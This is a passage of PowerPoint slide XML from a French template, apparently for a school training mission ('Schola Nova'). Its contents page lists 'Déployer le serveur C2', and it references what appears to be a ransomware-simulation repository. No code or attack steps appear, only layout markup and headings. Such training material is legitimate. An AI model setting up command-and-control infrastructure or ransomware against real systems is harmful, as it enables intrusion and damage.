                      <a:pt x="182" y="197"/>
                      <a:pt x="176" y="218"/>
                      <a:pt x="164" y="247"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="251"/>
                      <a:pt x="166" y="252"/>
                      <a:pt x="169" y="252"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="252"/>
                      <a:pt x="182" y="247"/>
                      <a:pt x="196" y="235"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="231"/>
                      <a:pt x="202" y="231"/>
                      <a:pt x="204" y="231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205" y="231"/>
                      <a:pt x="207" y="232"/>
                      <a:pt x="207" y="234"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="207" y="237"/>
                      <a:pt x="205" y="242"/>
                      <a:pt x="201" y="247"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="192" y="98"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="98"/>
                      <a:pt x="185" y="96"/>
                      <a:pt x="182" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="91"/>
                      <a:pt x="173" y="85"/>
                      <a:pt x="173" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="65"/>
                      <a:pt x="179" y="57"/>
                      <a:pt x="186" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="190" y="49"/>
                      <a:pt x="195" y="48"/>
                      <a:pt x="198" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="213" y="48"/>
                      <a:pt x="219" y="59"/>
                      <a:pt x="219" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="219" y="82"/>
                      <a:pt x="206" y="98"/>
                      <a:pt x="192" y="98"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="F2F2F2"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="254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prstClr val="black"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="Rectangle 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED91FD97-EDB5-4CE2-BCDA-65533327FAE4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2689543" y="2010311"/>
                <a:ext cx="1885826" cy="1323439"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F2F2F2"/>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1000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Pour passer d’un niveau</a:t>
                </a:r>
                <a:br>
                  <a:rPr kumimoji="0" lang="fr-FR" sz="1000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr kumimoji="0" lang="fr-FR" sz="1000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de puces à un autre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000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Sélectionner la ligne souhaitée et utiliser la tabulation vers l’avant ou vers l’arrière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ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRP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fr-FR" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="595959"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="Image 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BAC6379-9000-4F06-9736-585B180D91A4}"/>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302328" y="3962222"/>
              <a:ext cx="180768" cy="199216"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="Image 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90B5246-22B5-428E-8745-E1A3A60E72CD}"/>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7567210" y="3962222"/>
              <a:ext cx="180768" cy="199216"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1877799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BD4FF67-7970-4CB4-80CC-3E31CA1C3F56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="11040611" cy="424732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="144000" bIns="45720" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD5EE594-DD4D-4E06-AE5B-198CC64FD3C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="309880" y="1449705"/>
            <a:ext cx="10515600" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="90000" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cliquez ici pour insérer votre texte de niveau 01, police </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Gilroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, taille de police 18, gras</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cliquez ici pour insérer votre texte de niveau 02, police </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Gilroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, taille de police 16, sans gras</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cliquez ici pour insérer votre texte de niveau 02, police </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Gilroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, taille de police 14, sans gras</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cliquez ici pour insérer votre texte de niveau 02, police </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Gilroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, taille de police 12, sans gras</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du pied de page 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32BE0A63-3BB2-486F-A429-B2CA4A76190F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440998" y="6453631"/>
            <a:ext cx="4114800" cy="211203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="36000" rIns="91440" bIns="36000" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="900" cap="all" spc="100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Titre de la présentation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du numéro de diapositive 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62BFC46F-2E9B-4385-8F91-B65476AD155C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11602098" y="6443816"/>
            <a:ext cx="391454" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gilroy Bold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Image 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{164F6CCD-953F-438B-BC31-574F9E6E1091}"/>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59408" y="6467625"/>
            <a:ext cx="1200124" cy="134131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3828371816"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483650" r:id="rId1"/>
    <p:sldLayoutId id="2147483655" r:id="rId2"/>
    <p:sldLayoutId id="2147483652" r:id="rId3"/>
    <p:sldLayoutId id="2147483653" r:id="rId4"/>
    <p:sldLayoutId id="2147483676" r:id="rId5"/>
    <p:sldLayoutId id="2147483654" r:id="rId6"/>
    <p:sldLayoutId id="2147483677" r:id="rId7"/>
    <p:sldLayoutId id="2147483665" r:id="rId8"/>
    <p:sldLayoutId id="2147483658" r:id="rId9"/>
    <p:sldLayoutId id="2147483659" r:id="rId10"/>
    <p:sldLayoutId id="2147483679" r:id="rId11"/>
    <p:sldLayoutId id="2147483680" r:id="rId12"/>
    <p:sldLayoutId id="2147483675" r:id="rId13"/>
    <p:sldLayoutId id="2147483678" r:id="rId14"/>
    <p:sldLayoutId id="2147483666" r:id="rId15"/>
    <p:sldLayoutId id="2147483667" r:id="rId16"/>
    <p:sldLayoutId id="2147483669" r:id="rId17"/>
    <p:sldLayoutId id="2147483670" r:id="rId18"/>
    <p:sldLayoutId id="2147483671" r:id="rId19"/>
    <p:sldLayoutId id="2147483672" r:id="rId20"/>
    <p:sldLayoutId id="2147483683" r:id="rId21"/>
    <p:sldLayoutId id="2147483682" r:id="rId22"/>
    <p:sldLayoutId id="2147483681" r:id="rId23"/>
    <p:sldLayoutId id="2147483673" r:id="rId24"/>
    <p:sldLayoutId id="2147483657" r:id="rId25"/>
    <p:sldLayoutId id="2147483684" r:id="rId26"/>
    <p:sldLayoutId id="2147483685" r:id="rId27"/>
    <p:sldLayoutId id="2147483662" r:id="rId28"/>
    <p:sldLayoutId id="2147483660" r:id="rId2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400" kern="1200" cap="all" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Gilroy ExtraBold" panose="020B0604020202020204" charset="0"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1200"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1800" b="1" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="444500" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1200"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="628650" indent="-141288" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1200"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>
        </a:buClr>
        <a:buFont typeface="Gilroy" panose="020B0604020202020204" charset="0"/>
        <a:buChar char="–"/>
        <a:tabLst/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="804863" indent="-152400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1200"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="tx2"/>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12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JoelGMSec/PSRans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CD2EA047-2163-4621-AB80-1FAF45552043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598920" y="1921214"/>
            <a:ext cx="5237480" cy="2554545"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>FICHE MISSION école</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Espace réservé du texte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22655006-306B-4E5A-B9BD-40A1617391D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Schola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nova </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connecteur droit 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15F21829-8FDC-403C-809D-3291EA185EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8113853" y="3646025"/>
            <a:ext cx="283579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Espace réservé pour une image  10" descr="Une image contenant Police, texte, Graphique, blanc&#10;&#10;Le contenu généré par l’IA peut être incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F3B343A-F0DA-3890-568A-0B1FFCFD07E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5556" r="5556"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1808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re 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D4E08C3-B2DB-4AF4-93DC-822909B7C6E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>SOMMAIRE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Espace réservé du texte 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DBB6F63-CF5E-4DD9-A479-602888C8F9AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Présentation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Espace réservé du texte 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{290B08AC-B5EC-4C17-A9E5-B008F75880D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Espace réservé du texte 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12954CA5-D774-41EE-BDC2-08138DEE9D19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Déployer le serveur C2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Espace réservé du texte 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB0773D-42E6-4443-988F-A87C9516A149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Espace réservé du texte 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD0E2B76-DBE2-4F03-9629-D0A775860FEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Espace réservé du texte 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE0A1C67-93D3-46DA-8850-A1EC14F0BB84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
